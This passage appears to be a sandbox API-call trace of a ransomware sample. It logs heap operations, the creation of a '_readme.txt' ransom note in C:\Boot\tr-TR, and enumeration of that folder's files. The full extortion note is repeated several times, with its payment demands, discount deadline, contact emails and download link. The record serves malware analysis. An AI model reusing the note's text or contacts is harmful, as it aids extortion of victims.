out: hHeap=0xcd0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.756] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.756] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.757] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.757] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.758] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.759] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.759] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.759] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.759] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.759] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.759] PathFindFileNameW (pszPath="") returned="" [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.759] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.759] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.759] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.759] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.760] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.760] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.760] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0165.760] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.760] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.760] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0165.761] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.761] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.761] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.761] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.761] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.761] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.761] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.761] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.761] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.761] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.761] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.761] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.761] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.761] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.762] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.762] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.762] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 